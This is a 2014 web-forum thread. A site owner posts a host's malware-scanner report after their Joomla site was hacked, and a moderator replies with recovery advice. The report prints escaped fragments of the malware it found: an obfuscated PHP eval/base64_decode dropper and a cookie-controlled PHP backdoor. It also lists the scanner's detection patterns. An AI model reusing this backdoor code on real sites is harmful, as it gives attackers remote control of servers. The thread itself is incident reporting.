Forum Support

Shape 5
March 29, 2024, 01:31:14 AM *
Welcome, Guest. Please login or register.

Login with username, password and session length
News: Shape 5 Forum
 
   Home   Help Search Login Register  
Pages: [1]
  Print  
Author Topic: Looks like my site has been hacked !!  (Read 337 times)
hoppline
Jr. Member
**
Offline Offline

Posts: 172



« on: April 10, 2014, 12:37:41 PM »

My site went offline a few minutes ago and I got a mail from my host with the following below!! In communication with my host I deleted two files and they put the site back online. Afterwards I changed all passwords and users. Anything else I have to think off?


###########################################################
#
#                         MalwareScanner
#
#
# Beschreibung:
# Der MalwareScanner ist Signatur basiert und kann daher nur bekannte Malware finden!
# Dieser prueft nur Dateien mit bestimmten Endungen, welche nicht binaer sind.
#
# Bei wenigen Treffer/Funde (weniger als 3 Stueck), pruefen Sie bitte die Suchmuster, Warnings und Signatur-Version im Detail manuell!
# Bei Fragen oder nicht gefundener Malware, wenden Sie sich bitte an unsere Technik-Abteilung.
#
#
#
# Signatur:            2014-04-09 17:34:00
# Such-Pfad:           /kunden/
# Start-Zeit:          10.04.2014 19:27:22 +0200
#
#
# Alle Ergebnisse OHNE GEWAEHR!!!
#
###########################################################

Lese nun alle Verzeichnisse ein........
Pruefe nun die Files auf Malware.....

0% abgeschlossen.

10% abgeschlossen.

20% abgeschlossen.




FUNDE: 2x
#######################################
/kunden/XXXXX/administrator/components/com_profiles/filemanager/js/dojo.js      
#######################################
Changed    ->   12.02.2014 03:46:15 +0100
Zeile    ->   SuchMuster         ->     FUND (Max. 300 Zeichen, gekuerzt, escaped..., angezeigt maximal: 20)
16    ->   .*=.*s.*pli.*t.*;.*=.*;...   ->     \(function\(\)\{var _1=null\;if\(\(_1\|\|\(typeof djConfig!=\&\#34\;undefined\&\#34\;\&\&djConfig.scopeMap\)\)\&\&\(typeof window!=\&\#34\;undefined\&\#34\;\)\)\{var _2=\&\#34\;\&\#34\;,_3=\&\#34\;\&\#34\;,_4=\&\#34\;\&\#34\;,_5=\{\},_6=\{\}\;_1=_1\|\|djConfig.scopeMap\;for\(var i=0\;i
16    ->   eval(_(.*)((.*)((.*))))   ->     \(function\(\)\{var _1=null\;if\(\(_1\|\|\(typeof djConfig!=\&\#34\;undefined\&\#34\;\&\&djConfig.scopeMap\)\)\&\&\(typeof window!=\&\#34\;undefined\&\#34\;\)\)\{var _2=\&\#34\;\&\#34\;,_3=\&\#34\;\&\#34\;,_4=\&\#34\;\&\#34\;,_5=\{\},_6=\{\}\;_1=_1\|\|djConfig.scopeMap\;for\(var i=0\;i



FUNDE: 1x
#######################################
/kunden/XXXXX/administrator/components/com_profiles/filemanager/js/codemirror/lib/util/closetag.js      
#######################################
Changed    ->   12.02.2014 03:46:15 +0100
Zeile    ->   SuchMuster         ->     FUND (Max. 300 Zeichen, gekuerzt, escaped..., angezeigt maximal: 20)
39    ->   WARNING: "keygen",         ->     var htmlDontClose = \[\&\#34\;area\&\#34\;, \&\#34\;base\&\#34\;, \&\#34\;br\&\#34\;, \&\#34\;col\&\#34\;, \&\#34\;command\&\#34\;, \&\#34\;embed\&\#34\;, \&\#34\;hr\&\#34\;, \&\#34\;img\&\#34\;, \&\#34\;input\&\#34\;, \&\#34\;keygen\&\#34\;, \&\#34\;link\&\#34\;, \&\#34\;meta\&\#34\;, \&\#34\;param\&\#34\;,
30% abgeschlossen.

40% abgeschlossen.

50% abgeschlossen.




FUNDE: 9x
#######################################
/kunden/XXXXX/components/com_jdonation/dtyh33.php      
#######################################
Changed    ->   09.04.2014 04:20:59 +0200
Zeile    ->   SuchMuster         ->     FUND (Max. 300 Zeichen, gekuerzt, escaped..., angezeigt maximal: 20)
1    ->   .*eval((.*));exit         ->     \<\?php \$\{"GLOBALS"\}\["vbopuhuwlwj"\]="func"\;\$\{"GLOBALS"\}\["sglecinjqj"\]="h"\;\$\{"GLOBALS"\}\["ghvlqxys"\]="res"\;\$\{"GLOBALS"\}\["eidxzltlegek"\]="h_detected"\;\$\{"GLOBALS"\}\["eqlpdjq"\]="headers"\;\$\{"GLOBALS"\}\["npnjrfmeyknj"\]="data"\;\$\{"GLOBALS"\}\["iopwylwq"\]="k"\;\$\{"GLOBALS"\}\["dwpolchwjza"\]="cookie"\;\$\{"GLOBALS"\}\[\"sqmvc
1    ->   <?php ${"GLOBALS"}[.*]=...   ->     \<\?php \$\{"GLOBALS"\}\["vbopuhuwlwj"\]="func"\;\$\{"GLOBALS"\}\["sglecinjqj"\]="h"\;\$\{"GLOBALS"\}\["ghvlqxys"\]="res"\;\$\{"GLOBALS"\}\["eidxzltlegek"\]="h_detected"\;\$\{"GLOBALS"\}\["eqlpdjq"\]="headers"\;\$\{"GLOBALS"\}\["npnjrfmeyknj"\]="data"\;\$\{"GLOBALS"\}\["iopwylwq"\]="k"\;\$\{"GLOBALS"\}\["dwpolchwjza"\]="cookie"\;\$\{"GLOBALS"\}\[\"sqmvc
1    ->   @fclose(${${"GLOBALS"}[...   ->     \<\?php \$\{"GLOBALS"\}\["vbopuhuwlwj"\]="func"\;\$\{"GLOBALS"\}\["sglecinjqj"\]="h"\;\$\{"GLOBALS"\}\["ghvlqxys"\]="res"\;\$\{"GLOBALS"\}\["eidxzltlegek"\]="h_detected"\;\$\{"GLOBALS"\}\["eqlpdjq"\]="headers"\;\$\{"GLOBALS"\}\["npnjrfmeyknj"\]="data"\;\$\{"GLOBALS"\}\["iopwylwq"\]="k"\;\$\{"GLOBALS"\}\["dwpolchwjza"\]="cookie"\;\$\{"GLOBALS"\}\[\"sqmvc
1    ->   ${"GLOBALS"}[.*]=".*";$...   ->     \<\?php \$\{"GLOBALS"\}\["vbopuhuwlwj"\]="func"\;\$\{"GLOBALS"\}\["sglecinjqj"\]="h"\;\$\{"GLOBALS"\}\["ghvlqxys"\]="res"\;\$\{"GLOBALS"\}\["eidxzltlegek"\]="h_detected"\;\$\{"GLOBALS"\}\["eqlpdjq"\]="headers"\;\$\{"GLOBALS"\}\["npnjrfmeyknj"\]="data"\;\$\{"GLOBALS"\}\["iopwylwq"\]="k"\;\$\{"GLOBALS"\}\["dwpolchwjza"\]="cookie"\;\$\{"GLOBALS"\}\[\"sqmvc
1    ->   <?php ${"GL.*B.*L.*"}[....   ->     \<\?php \$\{"GLOBALS"\}\["vbopuhuwlwj"\]="func"\;\$\{"GLOBALS"\}\["sglecinjqj"\]="h"\;\$\{"GLOBALS"\}\["ghvlqxys"\]="res"\;\$\{"GLOBALS"\}\["eidxzltlegek"\]="h_detected"\;\$\{"GLOBALS"\}\["eqlpdjq"\]="headers"\;\$\{"GLOBALS"\}\["npnjrfmeyknj"\]="data"\;\$\{"GLOBALS"\}\["iopwylwq"\]="k"\;\$\{"GLOBALS"\}\["dwpolchwjza"\]="cookie"\;\$\{"GLOBALS"\}\[\"sqmvc
1    ->   {eval(base64_decode($_(...   ->     \<\?php \$\{"GLOBALS"\}\["vbopuhuwlwj"\]="func"\;\$\{"GLOBALS"\}\["sglecinjqj"\]="h"\;\$\{"GLOBALS"\}\["ghvlqxys"\]="res"\;\$\{"GLOBALS"\}\["eidxzltlegek"\]="h_detected"\;\$\{"GLOBALS"\}\["eqlpdjq"\]="headers"\;\$\{"GLOBALS"\}\["npnjrfmeyknj"\]="data"\;\$\{"GLOBALS"\}\["iopwylwq"\]="k"\;\$\{"GLOBALS"\}\["dwpolchwjza"\]="cookie"\;\$\{"GLOBALS"\}\[\"sqmvc
1    ->   eval(base64_decode($_.*...   ->     \<\?php \$\{"GLOBALS"\}\["vbopuhuwlwj"\]="func"\;\$\{"GLOBALS"\}\["sglecinjqj"\]="h"\;\$\{"GLOBALS"\}\["ghvlqxys"\]="res"\;\$\{"GLOBALS"\}\["eidxzltlegek"\]="h_detected"\;\$\{"GLOBALS"\}\["eqlpdjq"\]="headers"\;\$\{"GLOBALS"\}\["npnjrfmeyknj"\]="data"\;\$\{"GLOBALS"\}\["iopwylwq"\]="k"\;\$\{"GLOBALS"\}\["dwpolchwjza"\]="cookie"\;\$\{"GLOBALS"\}\[\"sqmvc
1    ->   WARNING: eval(base64      ->     \<\?php \$\{"GLOBALS"\}\["vbopuhuwlwj"\]="func"\;\$\{"GLOBALS"\}\["sglecinjqj"\]="h"\;\$\{"GLOBALS"\}\["ghvlqxys"\]="res"\;\$\{"GLOBALS"\}\["eidxzltlegek"\]="h_detected"\;\$\{"GLOBALS"\}\["eqlpdjq"\]="headers"\;\$\{"GLOBALS"\}\["npnjrfmeyknj"\]="data"\;\$\{"GLOBALS"\}\["iopwylwq"\]="k"\;\$\{"GLOBALS"\}\["dwpolchwjza"\]="cookie"\;\$\{"GLOBALS"\}\[\"sqmvc
0    ->   WARNING: 2 Zeilen, 19x boeser Code   ->     \<\?php \$\{"GLOBALS"\}\["vbopuhuwlwj"\]="func"\;\$\{"GLOBALS"\}\["sglecinjqj"\]="h"\;\$\{"GLOBALS"\}\["ghvlqxys"\]="res"\;\$\{"GLOBALS"\}\["eidxzltlegek"\]="h_detected"\;\$\{"GLOBALS"\}\["eqlpdjq"\]="headers"\;\$\{"GLOBALS"\}\["npnjrfmeyknj"\]="data"\;\$\{"GLOBALS"\}\["iopwylwq"\]="k"\;\$\{"GLOBALS"\}\["dwpolchwjza"\]="cookie"\;\$\{"GLOBALS"\}\[\"sqmvc
60% abgeschlossen.




FUNDE: 6x
#######################################
/kunden/XXXXX/images/.jindex.php      
#######################################
Changed    ->   08.04.2014 00:23:18 +0200
Zeile    ->   SuchMuster         ->     FUND (Max. 300 Zeichen, gekuerzt, escaped..., angezeigt maximal: 20)
0    ->   !!! BadFileName (File)      ->     Boeser Datei-Name
0    ->   !!! BadFileName (File)      ->     Boeser Datei-Name
10    ->   .*=@$_COOKIE[.Jlma3.];      ->     \$file=@\$_COOKIE\[\&\#39\;Jlma3\&\#39\;\]\;
10    ->   Jlma3      ->     \$file=@\$_COOKIE\[\&\#39\;Jlma3\&\#39\;\]\;
11    ->   Jlma1      ->     if \(\$file\)\{ \$opt=\$file\(@\$_COOKIE\[\&\#39\;Jlma2\&\#39\;\]\)\; \$au=\$file\(@\$_COOKIE\[\&\#39\;Jlma1\&\#39\;\]\)\; \$opt\(\&\#34\;/292/\&\#34\;,\$au,292\)\; die\(\)\;\} else \{phpinfo\(\)\;die\;\}\}\}
11    ->   Jlma2      ->     if \(\$file\)\{ \$opt=\$file\(@\$_COOKIE\[\&\#39\;Jlma2\&\#39\;\]\)\; \$au=\$file\(@\$_COOKIE\[\&\#39\;Jlma1\&\#39\;\]\)\; \$opt\(\&\#34\;/292/\&\#34\;,\$au,292\)\; die\(\)\;\} else \{phpinfo\(\)\;die\;\}\}\}
« Last Edit: April 10, 2014, 01:58:38 PM by hoppline » Logged
mikenicoll
Global Moderator
*****
Offline Offline

Posts: 20162



WWW
« Reply #1 on: April 10, 2014, 10:13:50 PM »

Hello,

I would contact your host and initiate a full backup from when your site was functional. Also be sure to read up on the Joomla Security Blog and extensions on extensions.joomla.org. They can provide some useful information and extensions to help protect your site.

-Mike
Logged

Mike Nicoll
------------
Shape 5 Team

- Need a great host for your website? We highly recommend siteground.com!


- Put your trust in the hands of our extremely qualified staff to get your job done right!


- Firebug is the most powerful web development and debugging tool, and it will save you a lot of time, frustration and forum questions:
Install Firebug
Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com
Valid XHTML 1.0! Valid CSS!
Looking for the largest variety in template designs? Look no more. Never buy 1 theme again. Signups start at just $89 for access to all of our themes.
Send Us An Email
Please send us your questions and we will email you back as soon as we can. Product support questions should be posted in our support forums under the Help menu. Our staff will assist you from there.